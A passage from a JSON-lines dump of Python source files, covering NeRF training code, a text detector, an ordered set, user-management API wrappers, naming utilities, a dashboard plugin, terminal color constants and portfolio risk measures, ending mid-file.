self.hparams.optim_body_params:\n body_model_params = self.body_model_params(frame_idx)\n results = self(rays, body_model_params, body_model_params_template, latent_code=latent_code)\n loss, loss_details = self.compute_loss(rgbs, alphas, results, frame_idx=frame_idx, fg_points=fg_points, bg_points=bg_points)\n self.log('train/loss', loss, on_step=True, on_epoch=False, prog_bar=True, logger=True)\n for loss_name in loss_details.keys():\n self.log('train/{}'.format(loss_name), loss_details[loss_name], on_step=True, on_epoch=False, prog_bar=True, logger=True)\n \n with torch.no_grad():\n if 'rgbs_fine' in results:\n train_psnr = psnr(results['rgbs_fine'], rgbs)\n else:\n train_psnr = psnr(results['rgbs'], rgbs)\n self.log('train/psnr', train_psnr, on_step=True, on_epoch=False, prog_bar=True, logger=True)\n \n lr = get_learning_rate(self.optimizer)\n self.log('lr', lr, on_step=False, on_epoch=True, prog_bar=False, logger=True)\n\n return loss\n \n\n def validation_step(self, batch, batch_nb):\n frame_id, cam_id, frame_idx, rays, rgbs, alphas, body_model_params, body_model_params_template, fg_points, bg_points = self.decode_batch(batch)\n if self.hparams.latent_dim > 0:\n if frame_idx != -1:\n latent_code = self.latent_codes(frame_idx)\n else:\n latent_code = self.latent_codes(torch.zeros_like(frame_idx))\n else:\n latent_code = None\n if self.hparams.optim_body_params and frame_idx != -1:\n body_model_params = self.body_model_params(frame_idx)\n # else:\n # body_model_params['betas'] = self.body_model_params.betas(torch.zeros_like(frame_idx))\n results = self(rays, body_model_params, body_model_params_template, latent_code=latent_code)\n loss, _ = self.compute_loss(rgbs, alphas, results)\n self.log('val/loss', loss, on_step=False, on_epoch=True, prog_bar=True, logger=True)\n\n if 'rgbs_fine' in results:\n val_psnr = psnr(results['rgbs_fine'], rgbs)\n else:\n val_psnr = psnr(results['rgbs'], rgbs)\n self.log('val/psnr', val_psnr, on_step=False, on_epoch=True, prog_bar=True, logger=True)\n \n W, H = self.hparams.img_wh\n \n def visualize(frame_id, cam_id, rgbs_gt, rgbs, depths, W, H):\n img = rgbs.cpu().view(H, W, 3).permute(2, 0, 1) # (3, H, W)\n img_gt = rgbs_gt.cpu().view(H, W, 3).permute(2, 0, 1) # (3, H, W)\n depth = visualize_depth(depths.cpu().view(H, W))\n stack = torch.stack([img_gt, img, depth]) # (3, 3, H, W)\n self.logger.experiment.add_images('val/GT_pred_depth_cam{:0>3d}_{:0>6d}'.format(cam_id, frame_id), stack, self.global_step)\n\n if batch_nb % self.hparams.val.vis_freq == 0:\n if 'rgbs_fine' in results:\n visualize(frame_id.item(), cam_id.item(), rgbs, results['rgbs_fine'], results['depths_fine'], W, H)\n else:\n visualize(frame_id.item(), cam_id.item(), rgbs, results['rgbs'], results['depths'], W, H)\n \n return loss\n \n def test_step(self, batch, batch_nb):\n frame_id, cam_id, frame_idx, rays, rgbs, alphas, body_model_params, body_model_params_template, fg_points, bg_points = self.decode_batch(batch)\n if self.hparams.latent_dim > 0:\n if frame_idx != -1:\n latent_code = self.latent_codes(frame_idx)\n else:\n latent_code = self.latent_codes(torch.zeros_like(frame_idx))\n else:\n latent_code = None\n if self.hparams.optim_body_params and frame_idx != -1:\n body_model_params = self.body_model_params(frame_idx)\n # else:\n # body_model_params['betas'] = self.body_model_params.betas(torch.zeros_like(frame_idx))\n results = self(rays, body_model_params, body_model_params_template, latent_code=latent_code, perturb=0.0)\n loss, _ = self.compute_loss(rgbs, alphas, results)\n self.log('test/loss', loss, on_step=False, on_epoch=True, prog_bar=True, logger=False)\n\n if 'rgbs_fine' in results:\n test_psnr = psnr(results['rgbs_fine'], rgbs)\n else:\n test_psnr = psnr(results['rgbs'], rgbs)\n self.log('test/psnr', test_psnr, on_step=False, on_epoch=True, prog_bar=True, logger=False)\n \n W, H = self.hparams.img_wh\n \n def visualize(frame_id, cam_id, rgbs_gt, rgbs, depths, W, H):\n img = rgbs.cpu().view(H, W, 3).permute(2, 0, 1) # (3, H, W)\n img_gt = rgbs_gt.cpu().view(H, W, 3).permute(2, 0, 1) # (3, H, W)\n depth = visualize_depth(depths.cpu().view(H, W))\n stack = torch.stack([img_gt, img, depth]) # (3, 3, H, W)\n os.makedirs(os.path.join(self.hparams.outputs_dir, self.hparams.exp_name, 'cam{:0>3d}'.format(cam_id)), exist_ok=True)\n save_image(stack, '{}/{}/cam{:0>3d}/{:0>6d}.png'.format(self.hparams.outputs_dir, self.hparams.exp_name, cam_id, frame_id))\n #self.logger.experiment.add_images('test/GT_pred_depth_{}'.format(nb), stack, self.global_step)\n\n if batch_nb % self.hparams.test.vis_freq == 0:\n if 'rgbs_fine' in results:\n visualize(frame_id.item(), cam_id.item(), rgbs, results['rgbs_fine'], results['depths_fine'], W, H)\n else:\n visualize(frame_id.item(), cam_id.item(), rgbs, results['rgbs'], results['depths'], W, H)\n \n return loss\n\nif __name__ == '__main__':\n # torch.autograd.set_detect_anomaly(True)\n train_start_time = time.time()\n cfg = get_cfg()\n data = AnimNeRFData(cfg)\n system = AnimNeRFSystem(cfg)\n print(system)\n\n if cfg.train.ckpt_path is not None:\n for model_name in cfg.train.model_names_to_load:\n load_ckpt(getattr(system, model_name), cfg.train.ckpt_path, model_name)\n for param in getattr(system, model_name).parameters():\n param.requires_grad = cfg.train.pretrained_model_requires_grad\n \n checkpoint_callback = ModelCheckpoint(dirpath=f'{cfg.checkpoints_dir}/{cfg.exp_name}',\n filename='{epoch:d}',\n monitor='train/psnr',\n mode='max',\n save_top_k=cfg.train.save_top_k,\n save_last=cfg.train.save_last)\n\n logger = TensorBoardLogger(\n save_dir=cfg.logs_dir,\n name=cfg.exp_name,\n )\n\n trainer = Trainer(max_epochs=cfg.train.max_epochs,\n callbacks=[checkpoint_callback],\n logger=logger,\n gpus=cfg.num_gpus,\n strategy=cfg.train.strategy,\n num_sanity_val_steps=1,\n benchmark=True,\n profiler=\"simple\")\n\n trainer.fit(system, data, ckpt_path=cfg.train.ckpt_path if cfg.train.resume else None)\n trainer.test(datamodule=data)\n\n train_end_message = 'End of training \\t Time Taken: %.3f hours' % ((time.time() - train_start_time)/3600.0)\n print(train_end_message)"} {"ext": "py", "sha": "1a2ed4403a4bf9c2636129169b534c8c00be1050", "content": "from mmdet.models.builder import DETECTORS\n\nfrom .single_stage_text_detector import SingleStageTextDetector\nfrom .text_detector_mixin import TextDetectorMixin\n\n\n@DETECTORS.register_module()\nclass FCENet(TextDetectorMixin, SingleStageTextDetector):\n \"\"\"The class for implementing FCENet text detector\n FCENet(CVPR2021): Fourier Contour Embedding for Arbitrary-shaped Text\n Detection\n\n [https://arxiv.org/abs/2104.10442]\n \"\"\"\n\n def __init__(self,\n backbone,\n neck,\n bbox_head,\n train_cfg=None,\n test_cfg=None,\n pretrained=None,\n show_score=False,\n init_cfg=None):\n SingleStageTextDetector.__init__(self, backbone, neck, bbox_head,\n train_cfg, test_cfg, pretrained,\n init_cfg)\n TextDetectorMixin.__init__(self, show_score)\n\n def simple_test(self, img, img_metas, rescale=False):\n x = self.extract_feat(img)\n outs = self.bbox_head(x)\n boundaries = self.bbox_head.get_boundary(outs, img_metas, rescale)\n\n return [boundaries]\n"} {"ext": "py", "sha": "1a2ed47bfc16e006146e2f741497c36729e0cf0b", "content": "from collections.abc import MutableSet, Sequence\nfrom itertools import tee\n\n\nclass OrderedSet(MutableSet, Sequence):\n def __init__(self, iterable=None):\n if iterable is None:\n iterable = []\n\n it1, it2 = tee(iterable)\n self._set = set(it1)\n self._list = []\n for i in it2:\n if i not in self._list:\n self._list.append(i)\n\n def add(self, value):\n if value not in self._set:\n self._set.add(value)\n self._list.append(value)\n\n def discard(self, value):\n if value in self._set:\n self._set.discard(value)\n self._list.remove(value)\n\n def __contains__(self, value):\n return value in self._set\n\n def __len__(self):\n return len(self._set)\n\n def __iter__(self):\n return iter(self._list)\n\n def __getitem__(self, slice_):\n return self._list[slice_]\n\n def index(self, value, start=0, stop=None):\n return self._list[start: stop].index(value)\n\n def __repr__(self):\n return 'OrderedSet(' + ','.join(repr(i) for i in self) + ')'\n"} {"ext": "py", "sha": "1a2ed50591b8fa7750fb49f6df4e5567ff91879b", "content": "#!/usr/bin/env python3\n# Copyright (c) 2004-present Facebook All rights reserved.\n# Use of this source code is governed by a BSD-style\n# license that can be found in the LICENSE file.\n\nfrom typing import List, Optional\n\nfrom pysymphony import SymphonyClient\n\nfrom ..common.constant import SUPERUSER_ROLE, USER_ROLE\nfrom ..common.data_enum import Entity\nfrom ..exceptions import EntityNotFoundError\nfrom ..graphql.enum.user_role import UserRole\nfrom ..graphql.enum.user_status import UserStatus\nfrom ..graphql.fragment.user import UserFragment\nfrom ..graphql.input.edit_user import EditUserInput\nfrom ..graphql.mutation.edit_user import EditUserMutation\nfrom ..graphql.query.user import UserQuery\nfrom ..graphql.query.users import UsersQuery\n\n\ndef get_user(client: SymphonyClient, email: str) -> UserFragment:\n \"\"\"Returns `pyinventory.graphql.fragment.user.UserFragment` object by its email\n\n Args:\n email (str): the email address the user registered with\n\n Returns:\n `pyinventory.graphql.fragment.user.UserFragment` object\n\n Raises:\n `pyinventory.exceptions.EntityNotFoundError`: the user was not found\n FailedOperationException: internal inventory error\n\n Example:\n ```\n user = client.get_user(email=\"user@test.com\")\n ```\n \"\"\"\n user = UserQuery.execute(client, email)\n if user is None:\n raise EntityNotFoundError(entity=Entity.User, entity_name=email)\n return UserFragment(\n id=user.id,\n authID=user.authID,\n email=user.email,\n status=user.status,\n role=user.role,\n )\n\n\ndef add_user(client: SymphonyClient, email: str, password: str) -> UserFragment:\n \"\"\"Adds new user to inventory with its email and password\n\n Args:\n email (str): the email address of the user\n password (str): password the user would connect with\n\n Returns:\n `pyinventory.graphql.fragment.user.UserFragment` object\n\n Raises:\n `pyinventory.exceptions.EntityNotFoundError`: the user was not created properly\n FailedOperationException: internal inventory error\n AssertionError: The user was not created for some known reason\n HTTPError: Error with connection\n\n Example:\n ```\n user = client.add_user(email=\"user@test.com\", password=\"P0ssW!rd0f43\")\n ```\n \"\"\"\n resp = client.post(\n \"/user/async/\",\n {\"email\": email, \"password\": password, \"role\": USER_ROLE, \"networkIDs\": []},\n )\n\n if not resp.ok:\n error_message = resp.json().get(\"error\", None)\n if error_message is not None:\n raise AssertionError(error_message)\n raise\n\n return get_user(client=client, email=email)\n\n\ndef edit_user(\n client: SymphonyClient,\n user: UserFragment,\n new_password: Optional[str] = None,\n new_role: Optional[UserRole] = None,\n) -> None:\n \"\"\"Edit user password and role\n\n Args:\n user ( `pyinventory.graphql.fragment.user.UserFragment` ): user to edit\n new_password (Optional[str]): new password the user would connect with\n new_role ( `pyinventory.graphql.enum.user_role.UserRole` ): user new role\n\n Raises:\n FailedOperationException: internal inventory error\n AssertionError: The user was not edited for some known reason\n HTTPError: Error with connection\n\n Example:\n ```\n user = client.add_user(email=\"user@test.com\", password=\"P0ssW!rd0f43\")\n client.edit_user(user=user, new_password=\"New_Password4Ever\", new_role=UserRole.ADMIN)\n ```\n \"\"\"\n params = {}\n if new_password is not None:\n params.update({\"password\": new_password})\n if new_role is not None:\n params.update(\n {\"role\": USER_ROLE if new_role == UserRole.USER else SUPERUSER_ROLE}\n )\n resp = client.put(f\"/user/set/{user.email}\", params)\n\n if not resp.ok:\n error_message = resp.json().get(\"error\", None)\n if error_message is not None:\n raise AssertionError(error_message)\n raise\n\n if new_role is not None:\n EditUserMutation.execute(client, input=EditUserInput(id=user.id, role=new_role))\n\n\ndef deactivate_user(client: SymphonyClient, user: UserFragment) -> None:\n \"\"\"Deactivate the user which would prevent the user from login in to symphony\n Users in symphony are never deleted. Only de-activated.\n\n\n Args:\n user ( `pyinventory.graphql.fragment.user.UserFragment` ): user to deactivate\n\n\n Raises:\n FailedOperationException: internal inventory error\n\n Example:\n ```\n user = client.get_user(email=\"user@test.com\")\n client.deactivate_user(user=user)\n ```\n \"\"\"\n EditUserMutation.execute(\n client, input=EditUserInput(id=user.id, status=UserStatus.DEACTIVATED)\n )\n\n\ndef activate_user(client: SymphonyClient, user: UserFragment) -> None:\n \"\"\"Activate the user which would allow the user to login again to symphony\n\n Args:\n user ( `pyinventory.graphql.fragment.user.UserFragment` ): user to activate\n\n Raises:\n FailedOperationException: internal inventory error\n\n Example:\n ```\n user = client.get_user(email=\"user@test.com\")\n client.activate_user(user=user)\n ```\n \"\"\"\n EditUserMutation.execute(\n client, input=EditUserInput(id=user.id, status=UserStatus.ACTIVE)\n )\n\n\ndef get_users(client: SymphonyClient) -> List[UserFragment]:\n \"\"\"Get the list of users in the system (both active and deactivate)\n\n Returns:\n List[ `pyinventory.graphql.fragment.user.UserFragment` ]\n\n Raises:\n FailedOperationException: internal inventory error\n\n Example:\n ```\n users = client.get_users()\n for user in users:\n print(user.email)\n ```\n \"\"\"\n result = UsersQuery.execute(client)\n if result is None:\n return []\n users = []\n for edge in result.edges:\n node = edge.node\n if node is not None:\n users.append(\n UserFragment(\n id=node.id,\n authID=node.authID,\n email=node.email,\n status=node.status,\n role=node.role,\n )\n )\n return users\n\n\ndef get_active_users(client: SymphonyClient) -> List[UserFragment]:\n \"\"\"Get the list of the active users in the system\n\n Returns:\n List[ `pyinventory.graphql.fragment.user.UserFragment` ]\n\n Raises:\n FailedOperationException: internal inventory error\n\n Example:\n ```\n users = client.get_active_users()\n for user in users:\n print(user.email)\n ```\n \"\"\"\n users = get_users(client=client)\n return [user for user in users if user.status == UserStatus.ACTIVE]\n"} {"ext": "py", "sha": "1a2ed521273fc18d627e33dab6c4d4e5e9b8bead", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport string\n\nPY2 = sys.version_info[0] == 2\nPY3 = sys.version_info[0] == 3\n\nif PY3:\n string_types = str,\n integer_types = int,\nelse:\n string_types = basestring,\n integer_types = (int, long)\n\nSEP = \"____\"\nKLS_NAME_CHARSET = set(string.ascii_letters + string.digits)\nVAR_NAME_CHARSET = set(string.ascii_lowercase + string.digits + \"_\")\nVAR_FORBIDDEN_CHARSET = set(\n r\"\"\"~`!@#$%^&*()-+={}[]|\\:;\"'<,>.?/\"\"\" + string.ascii_uppercase)\nINDEX_KEY_FORBIDDEN_CHARSET = set(r\"\"\"~`!@#$%^&*()-+={}[]|\\:;\"'<,>.?/\"\"\")\nWHITE_SPACE = set(string.whitespace)\n\n\ndef is_valid_class_name(name):\n \"\"\"Check if it is a valid variable name.\n\n A valid variable name has to:\n\n - start wither upper case\n - only alpha digits\n \"\"\"\n try:\n assert name[0].isupper()\n assert len(set(name).difference(KLS_NAME_CHARSET)) == 0\n return True\n except:\n return False\n\n\ndef is_valid_variable_name(name):\n \"\"\"Check if it is a valid variable name.\n\n A valid variable name has to:\n\n - start wither lower case\n - reserved SEPTERATOR is not in it.\n \"\"\"\n try:\n assert name[0].islower()\n assert SEP not in name\n assert len(set(name).difference(VAR_NAME_CHARSET)) == 0\n return True\n except:\n return False\n\n\ndef is_valid_surfix(name):\n \"\"\"Surfix is the attribute name used for index.\n\n **中文文档**\n\n 此方法暂时没用。\n \"\"\"\n try:\n assert SEP not in name\n assert len(VAR_FORBIDDEN_CHARSET.intersection(name)) == 0\n return True\n except:\n return False\n\n\ndef to_variable_name(cls_name):\n \"\"\"Convert class name to variable name format. usually use \"_\" to connect\n each word.\n\n **中文文档**\n\n 将类名转化为其实例的变量名。\n \"\"\"\n assert is_valid_class_name(cls_name)\n\n words = list()\n chunks = list()\n for char in cls_name:\n if char.isupper():\n words.append(\"\".join(chunks))\n chunks = [\"_\", char.lower()]\n else:\n chunks.append(char)\n words.append(\"\".join(chunks))\n return \"\".join(words)[1:]\n\n\ndef to_index_key(value):\n \"\"\"Convert a value to it's index key in string.\n Only alpha and digits and underscore is allowed. Whitespace delimiter will\n replaced with underscore.\n\n `` *David# #John* `` -> ``David_John``\n \"\"\"\n if isinstance(value, integer_types):\n key = str(value)\n\n elif isinstance(value, string_types):\n l = list()\n for c in value:\n if c not in INDEX_KEY_FORBIDDEN_CHARSET:\n if c in WHITE_SPACE:\n l.append(\" \")\n else:\n l.append(c)\n words = [word for word in \"\".join(\n l).strip().split(\" \") if word.strip()]\n key = \"_\".join(words)\n\n elif isinstance(value, float):\n key = str(value).replace(\".\", \"d\")\n\n else:\n raise TypeError(\"%r is not an indexable value.\")\n\n return key\n\n\ndef test_is_valid_class_name():\n for name in [\"User\", \"MyClass\", \"TestCase\"]:\n assert is_valid_class_name(name) is True\n\n for name in [\"user\", \"My_Class\", \"testCase\"]:\n assert is_valid_class_name(name) is False\n\n\ndef test_is_valid_variable_name():\n for name in [\"name\", \"my_class\", \"num1\"]:\n assert is_valid_variable_name(name) is True\n\n for name in [\"Name\", \"myClass\", \"1a\"]:\n assert is_valid_variable_name(name) is False\n\n\ndef test_is_valid_surfix():\n assert is_valid_surfix(\"大卫\") is True\n\n\ndef test_to_variable_name():\n assert to_variable_name(\"User\") == \"user\"\n assert to_variable_name(\"MyClass\") == \"my_class\"\n\n\ndef test_to_index_key():\n assert to_index_key(1) == \"1\"\n assert to_index_key(\"David John\") == \"David_John\"\n assert to_index_key(\" *David+ +John* \") == \"David_John\"\n assert to_index_key(\"中文\") == \"中文\"\n assert to_index_key(\" 英 文 \") == \"英_文\"\n assert to_index_key(3.14) == \"3d14\"\n\n\nif __name__ == \"__main__\":\n test_is_valid_class_name()\n test_is_valid_variable_name()\n test_is_valid_surfix()\n test_to_variable_name()\n test_to_index_key()\n"} {"ext": "py", "sha": "1a2ed5304b47b5ddd430dfd7759ebbcc9a4f02b4", "content": "from typing import List\n\nimport dash_html_components as html\n\nfrom .. import WebvizPluginABC\n\n\nclass ExampleTour(WebvizPluginABC):\n @property\n def tour_steps(self) -> List[dict]:\n return [\n {\"id\": self.uuid(\"blue_text\"), \"content\": \"This is the first step\"},\n {\"id\": self.uuid(\"red_text\"), \"content\": \"This is the second step\"},\n ]\n\n @property\n def layout(self) -> html.Div:\n return html.Div(\n children=[\n html.Span(\n \"Here is some blue text to explain... \",\n id=self.uuid(\"blue_text\"),\n style={\"color\": \"blue\"},\n ),\n html.Span(\n \" ...and here is some red text that also needs an explanation.\",\n id=self.uuid(\"red_text\"),\n style={\"color\": \"red\"},\n ),\n ]\n )\n"} {"ext": "py", "sha": "1a2ed6b5572c5252fd3e6bd67d2091d5e8e96cb4", "content": "#-----------Welcome to DeAdSeC Python Codex----------#\n#-------Made By DeAdSeC-------#\n#---Version 1.0.0---#\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nW = '\\033[0m' # white (normal)\nR = '\\033[31m' # red\nG = '\\033[32m' # green\nO = '\\033[33m' # orange\nB = '\\033[34m' # blue\nP = '\\033[35m' # purple\nC = '\\033[36m' # cyan\nGR = '\\033[37m' # gray\nD = '\\033[2m' # dims current color. {W} resets.\nPlus = f'{W}{D}[{W}{G}+{W}{D}]{W}' #[+]\nDanger = f'{O}[{R}!{O}]{W}' #[!]\nWTF = f'{W}[{C}?{W}]' #[?]\n"} {"ext": "py", "sha": "1a2ed73c6938b74922ea5d4c0a29b3adcb86a5a0", "content": "import torch\n\ndef config_device():\n # determine if gpu is to be used\n return torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef update_rule(fast_lr):\n def update_q(old, new):\n return old + fast_lr * (new - old)\n return update_q"} {"ext": "py", "sha": "1a2ed8fd542eee35350c522db44f819721ca587c", "content": "import numpy as np\nfrom scipy.optimize import minimize\nfrom scipy.optimize import Bounds\n\n\n__all__ = [\n \"MAD\",\n \"SemiDeviation\",\n \"VaR_Hist\",\n \"CVaR_Hist\",\n \"WR\",\n \"LPM\",\n \"Entropic_RM\",\n \"EVaR_Hist\",\n \"MDD_Abs\",\n \"ADD_Abs\",\n \"DaR_Abs\",\n \"CDaR_Abs\",\n \"EDaR_Abs\",\n \"UCI_Abs\",\n \"MDD_Rel\",\n \"ADD_Rel\",\n \"DaR_Rel\",\n \"CDaR_Rel\",\n \"EDaR_Rel\",\n \"UCI_Rel\",\n \"Sharpe_Risk\",\n \"Sharpe\",\n \"Risk_Contribution\",\n]\n\n\ndef MAD(X):\n r\"\"\"\n Calculate the Mean Absolute Deviation (MAD) of a returns series.\n\n .. math::\n \\text{MAD}(X) = \\frac{1}{T}\\sum_{t=1}^{T}\n | X_{t} - \\mathbb{E}(X_{t}) |\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Returns\n -------\n value : float\n MAD of a returns series.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Examples\n --------\n Examples should be written in doctest format, and should illustrate how\n to use the function.\n\n >>> print([i for i in example_generator(4)])\n [0, 1, 2, 3]\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n value = np.mean(np.absolute(a - np.mean(a, axis=0)), axis=0)\n value = np.array(value).item()\n\n return value\n\n\ndef SemiDeviation(X):\n r\"\"\"\n Calculate the Semi Deviation of a returns series.\n\n .. math::\n \\text{SemiDev}(X) = \\left [ \\frac{1}{T-1}\\sum_{t=1}^{T}\n (X_{t} - \\mathbb{E}(X_{t}))^2 \\right ]^{1/2}\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Semi Deviation of a returns series.\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n mu = np.mean(a, axis=0)\n value = mu - a\n n = value.shape[0]\n value = np.sum(np.power(value[np.where(value >= 0)], 2)) / (n - 1)\n value = np.power(value, 0.5).item()\n\n return value\n\n\ndef VaR_Hist(X, alpha=0.05):\n r\"\"\"\n Calculate the Value at Risk (VaR) of a returns series.\n\n .. math::\n \\text{VaR}_{\\alpha}(X) = -\\inf_{t \\in (0,T)} \\left \\{ X_{t} \\in\n \\mathbb{R}: F_{X}(X_{t})>\\alpha \\right \\}\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n alpha : float, optional\n Significance level of VaR. The default is 0.05.\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n VaR of a returns series.\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n sorted_a = np.sort(a, axis=0)\n index = int(np.ceil(alpha * len(sorted_a)) - 1)\n value = -sorted_a[index]\n value = np.array(value).item()\n\n return value\n\n\ndef CVaR_Hist(X, alpha=0.05):\n r\"\"\"\n Calculate the Conditional Value at Risk (CVaR) of a returns series.\n\n .. math::\n \\text{CVaR}_{\\alpha}(X) = \\text{VaR}_{\\alpha}(X) +\n \\frac{1}{\\alpha T} \\sum_{t=1}^{T} \\max(-X_{t} -\n \\text{VaR}_{\\alpha}(X), 0)\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n alpha : float, optional\n Significance level of CVaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n CVaR of a returns series.\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n sorted_a = np.sort(a, axis=0)\n index = int(np.ceil(alpha * len(sorted_a)) - 1)\n sum_var = 0\n for i in range(0, index + 1):\n sum_var = sum_var + sorted_a[i] - sorted_a[index]\n\n value = -sorted_a[index] - sum_var / (alpha * len(sorted_a))\n value = np.array(value).item()\n\n return value\n\n\ndef WR(X):\n r\"\"\"\n Calculate the Worst Realization (WR) or Worst Scenario of a returns series.\n\n .. math::\n \\text{WR}(X) = \\max(-X)\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n WR of a returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n sorted_a = np.sort(a, axis=0)\n value = -sorted_a[0]\n value = np.array(value).item()\n\n return value\n\n\ndef LPM(X, MAR=0, p=1):\n r\"\"\"\n Calculate the First or Second Lower Partial Moment of a returns series.\n\n .. math::\n \\text{LPM}(X, \\text{MAR}, 1) &= \\frac{1}{T}\\sum_{t=1}^{T}\n \\max(\\text{MAR} - X_{t}, 0) \\\\\n \\text{LPM}(X, \\text{MAR}, 2) &= \\left [ \\frac{1}{T-1}\\sum_{t=1}^{T}\n \\max(\\text{MAR} - X_{t}, 0)^{2} \\right ]^{\\frac{1}{2}} \\\\\n\n\n Where:\n\n :math:`\\text{MAR}` is the minimum acceptable return.\n :math:`p` is the order of the :math:`\\text{LPM}`.\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n MAR : float, optional\n Minimum acceptable return. The default is 0.\n p : float, optional can be {1,2} \n order of the :math:`\\text{LPM}`. The default is 1.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n p-th Lower Partial Moment of a returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n if p not in [1, 2]:\n raise ValueError(\"p can only be 1 or 2\")\n\n value = MAR - a\n\n if p == 2:\n n = value.shape[0] - 1\n else:\n n = value.shape[0]\n\n value = np.sum(np.power(value[np.where(value >= 0)], p)) / n\n value = np.power(value, 1 / p).item()\n\n return value\n\n\ndef Entropic_RM(X, z=1, alpha=0.05):\n r\"\"\"\n Calculate the Entropic Risk Measure (ERM) of a returns series.\n\n .. math::\n \\text{ERM}_{\\alpha}(X) = z\\ln \\left (\\frac{M_X(z^{-1})}{\\alpha} \\right )\n\n Where:\n\n :math:`M_X(z)` is the moment generating function of X.\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n theta : float, optional\n Risk aversion parameter, must be greater than zero. The default is 1.\n alpha : float, optional\n Significance level of EVaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n ERM of a returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n value = np.mean(np.exp(-1 / z * a), axis=0)\n value = z * (np.log(value) + np.log(1 / alpha))\n value = np.array(value).item()\n\n return value\n\n\ndef _Entropic_RM(z, X, alpha=0.05):\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n value = np.mean(np.exp(-1 / z * a), axis=0)\n value = z * (np.log(value) + np.log(1 / alpha))\n value = np.array(value).item()\n\n return value\n\n\ndef EVaR_Hist(X, alpha=0.05):\n r\"\"\"\n Calculate the Entropic Value at Risk (EVaR) of a returns series.\n\n .. math::\n \\text{EVaR}_{\\alpha}(X) = \\inf_{z>0} \\left \\{ z\n \\ln \\left (\\frac{M_X(z^{-1})}{\\alpha} \\right ) \\right \\}\n\n Where:\n\n :math:`M_X(t)` is the moment generating function of X.\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n alpha : float, optional\n Significance level of EVaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n (value, z) : tuple\n EVaR of a returns series and value of z that minimize EVaR.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n bnd = Bounds([1e-12], [np.inf])\n result = minimize(\n _Entropic_RM, [1], args=(X, alpha), method=\"SLSQP\", bounds=bnd, tol=1e-12\n )\n t = result.x\n t = t.item()\n value = _Entropic_RM(t, X, alpha)\n return (value, t)\n\n\ndef MDD_Abs(X):\n r\"\"\"\n Calculate the Maximum Drawdown (MDD) of a returns series\n using uncumpounded cumulative returns.\n\n .. math::\n \\text{MDD}(X) = \\max_{j \\in (0,T)} \\left [\\max_{t \\in (0,j)}\n \\left ( \\sum_{i=0}^{t}X_{i} \\right ) - \\sum_{i=0}^{j}X_{i} \\right ]\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n MDD of an uncumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n value = 0\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD = peak - i\n if DD > value:\n value = DD\n\n value = np.array(value).item()\n\n return value\n\n\ndef ADD_Abs(X):\n r\"\"\"\n Calculate the Average Drawdown (ADD) of a returns series\n using uncumpounded cumulative returns.\n\n .. math::\n 